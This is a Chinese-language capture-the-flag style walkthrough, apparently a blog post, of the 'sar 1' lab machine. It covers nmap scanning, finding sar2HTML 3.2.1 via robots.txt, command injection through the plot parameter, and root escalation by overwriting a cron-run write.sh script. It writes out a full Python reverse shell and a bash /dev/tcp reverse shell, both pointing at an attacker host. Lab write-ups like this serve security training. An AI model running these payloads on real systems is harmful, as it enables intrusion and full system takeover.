【学渗透靶机——sar 1】

信息收集

主机信息收集

主机ip

nmap -sn  192.168.241.0/24

在这里插入图片描述

主机端口开放

nmap --min-rate 10000 -p- 192.168.241.170

在这里插入图片描述

主机端口服务详情

nmap -sT -sV -sC -O -p80  192.168.241.170

在这里插入图片描述
在这里插入图片描述
主机漏洞扫描完成,这台靶机只开放了80 端口,通过nmap l漏洞扫描发现有robots.txt 和phpinfo.php 两个文件

web 信息收集

80 端口

80 端口默认页是一个apache服务的默认页面,没有什么特殊的地方
在这里插入图片描述
查看robots.txt文件 打开后是个字符串 sar2HTML

在这里插入图片描述
robots 这个文件是方式爬虫爬取网站的,那么这个字符串有可能就是路径了,访问看看,
在这里插入图片描述
sar2html 软件是生成报告的,版本为3.2.1

漏洞利用

searchsploit 搜索一下有没有这个漏洞的exp
在这里插入图片描述

那就好办了,,尝试利用下,镜像下来,打开看看

在这里插入图片描述
index.php 的参数plot 值使用分号隔开后加上系统命令造成远程命令执行
我们尝试一下
在这里插入图片描述
执行成功。。。

获取系统初始立足点

那我们直接写入反弹shell 就好了。。

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.241.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

靶机监听 ,
在这里插入图片描述

提权

查看当前用户以root 权限执行命令

sudo -l 执行后需要密码,暂时放弃

查看计划任务

在这里插入图片描述
切换到目录、var/www/html下 查看finally.sh ,这个脚本调用了write.sh ,
在这里插入图片描述
write.sh 这个脚本对当前用户有读写权限,

echo '#!/bin/sh' > write.sh
echo 'bash -c "bash -i >& /dev/tcp/192.168.241.131/4444 0>&1"' >>write.sh

在这里插入图片描述

静等5分钟 ,收到靶机连上反弹shell,确认用户为root
在这里插入图片描述

总结:
1、首先靶机主机ip发现, 端口扫描(),nmap 漏洞探测。

  • 扫描出主机192.168.241.170 只开放端口80
  • nmap 漏洞探测枚举出 robots.txt和phpinfo.php两个文件

2、web渗透

  • 打开网站发现是apache测试页,都收静态页面,没有什么有效信息,
  • 访问robots.txt 有个字符串sar2html,robots.txt 是防止爬虫爬取网的一些路径, 尝试路径访问,页面显示,
  • sar2html 软件是生成报告的,版本为3.2.1
  • searchsploit 搜索sar2htm 3.2 可利用的exp ,搜素结果是有个远程代码执行的exp,
  • 分析exp代码 是plot=NEW 值后添加分号能够执行系统命令,测试成功
  • 写入反弹shell 获取系统初始立足点
    3、提权:
  • 查看计划任务有个执行脚本finally.sh,分析这个脚本看见这个脚本调用了write.sh脚本,
    -write.sh 有写权限 ,在write.sh写入反弹shell ;
    4、 提权分析:
  • finally.sh 这个脚本是以root执行,执行过程调write.sh;
  • 在write.sh写入反弹shell,finally.sh执行write.sh 的反弹shell脚本后就能获取root 环境的shell
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值